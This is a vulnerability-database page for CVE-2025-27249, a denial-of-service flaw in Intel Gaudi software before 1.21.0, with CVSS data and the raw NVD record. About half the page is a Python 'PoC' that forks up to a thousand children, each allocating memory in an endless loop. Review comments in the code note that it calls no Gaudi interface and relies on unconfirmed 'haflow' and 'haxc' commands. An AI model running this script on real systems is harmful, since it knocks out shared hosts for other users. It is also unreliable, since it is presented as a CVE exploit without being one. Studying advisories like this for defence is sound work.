Security Vulnerability Report
CVE-2025-27249 CVSS 5.5 MEDIUM

CVE-2025-27249

Published: 2025-11-11 17:15:45
Last Modified: 2026-04-15 00:35:42

Description

Uncontrolled resource consumption for some Gaudi software before version 1.21.0 within Ring 3: User Applications may allow a denial of service. System software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score (v3.1 base; the raw record below also lists a CVSS v4.0 base score of 6.8)
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Intel Gaudi software < 1.21.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-27249 PoC - Intel Gaudi Uncontrolled Resource Consumption
# This PoC demonstrates resource exhaustion in Intel Gaudi software
# Target: Intel Gaudi software < 1.21.0
# Attack Vector: Local access with authenticated user
#
# NOTE(review): this listing was recovered from a page that collapsed the
# script onto two lines. Indentation is reconstructed; the placement of
# time.sleep(0.1) (every parent iteration vs. only every 100th) is a best
# guess and should be confirmed against the original.
#
# NOTE(review): nothing below calls a Gaudi library or driver interface. The
# only Gaudi-related steps are two external commands ('haflow' and 'haxc');
# the advisory text on this page does not mention them, so their existence
# and options are unconfirmed. Everything else is generic host-level process
# and memory pressure. Treat the script as unverified against CVE-2025-27249,
# not as a reproduction of the flaw.
#
# NOTE(review): independent of the vendor fix (upgrade to 1.21.0 or later per
# the description), per-user process limits (RLIMIT_NPROC) and cgroup
# pids.max / memory.max bound this pattern. The observable is one
# low-privileged UID creating processes in a loop.

import os
import sys
import time
import subprocess


def check_gaudi_software_version() -> bool:
    """Report whether `haflow --version` can be run on this host.

    Despite the name, no version comparison is made: the command output is
    printed and True is returned whenever the command exits successfully.
    The result therefore does not say whether the install is older than
    1.21.0.

    Returns:
        True if the command ran and its output decoded as UTF-8; False on
        any exception (missing binary, non-zero exit status, decode error).
    """
    try:
        # Run the version command, folding stderr into the captured output.
        # NOTE(review): 'haflow' is taken as-is from the listing; confirm it
        # is a real Gaudi tool before relying on this check.
        version_output = subprocess.check_output(
            ['haflow', '--version'],
            stderr=subprocess.STDOUT
        ).decode('utf-8')
        print(f"[+] Detected Gaudi software version: {version_output}")
        return True
    except Exception as e:
        # Broad catch: an absent binary and a failing command are reported
        # the same way.
        print(f"[-] Error checking version: {e}")
        return False


def trigger_resource_exhaustion() -> int:
    """Fork up to 1000 children that each spawn a command and allocate memory.

    The parent counts successful os.fork() calls and stops at max_processes
    or at the first OSError. Each child starts `haxc run --memory-intensive`
    with its output discarded, then loops forever allocating 100 MiB
    bytearrays in its own Python process. These are host-memory allocations;
    no Gaudi API is invoked from this function.

    Returns:
        Number of children the parent forked before the loop ended.
    """
    print("[*] Attempting to trigger resource exhaustion...")

    # Counter and cap for the parent's fork loop.
    process_count = 0
    max_processes = 1000

    while process_count < max_processes:
        try:
            # os.fork() exists only on POSIX platforms.
            pid = os.fork()
            if pid == 0:
                # Child: launch the external command without waiting for it.
                # NOTE(review): 'haxc' and '--memory-intensive' are unverified.
                # If the binary is missing, Popen raises FileNotFoundError (an
                # OSError), which the handler below catches inside the child.
                subprocess.Popen(
                    ['haxc', 'run', '--memory-intensive'],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL
                )
                # Child never returns from this loop; it is host RAM only.
                while True:
                    _ = bytearray(1024 * 1024 * 100)  # Allocate 100MB
            else:
                # Parent: count the child and report progress every 100 forks.
                process_count += 1
                if process_count % 100 == 0:
                    print(f"[*] Created {process_count} resource-intensive processes")
                time.sleep(0.1)
        except OSError as e:
            # A fork() failure lands here, e.g. when a per-user process limit
            # or memory limit on the host refuses to create another process.
            print(f"[!] Resource limit reached: {e}")
            break

    # Printed unconditionally. These messages reflect only the fork count,
    # not any measured effect on Gaudi software.
    print(f"[!] System resource exhaustion triggered")
    print(f"[!] Created {process_count} processes before failure")
    return process_count


def main() -> None:
    """Run the availability check, print the caller's identity, then run the loop.

    USER and the UID are printed for information only; no privilege level is
    enforced. "Success" is declared whenever at least one fork succeeded.
    """
    print("=" * 60)
    print("CVE-2025-27249 PoC - Intel Gaudi Uncontrolled Resource Consumption")
    print("=" * 60)

    # Stop early when the version command cannot be run.
    if not check_gaudi_software_version():
        print("[-] Intel Gaudi software not detected")
        return

    # Informational: shows which account the script runs under.
    print(f"[*] Current user: {os.getenv('USER', 'unknown')}")
    print(f"[*] Current UID: {os.getuid()}")

    # Run the fork/allocate loop.
    print("[*] Starting resource exhaustion attack...")
    result = trigger_resource_exhaustion()

    # result is the parent's fork count, so this branch does not confirm that
    # the CVE's code path was reached.
    if result > 0:
        print("[!] PoC executed successfully")
        print("[!] System may be experiencing DoS condition")
    else:
        print("[-] PoC failed to trigger vulnerability")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-27249", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:45.230", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled resource consumption for some Gaudi software before version 1.21.0 within Ring 3: User Applications may allow a denial of service. System software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01374.html", "source": "[email protected]"}]}}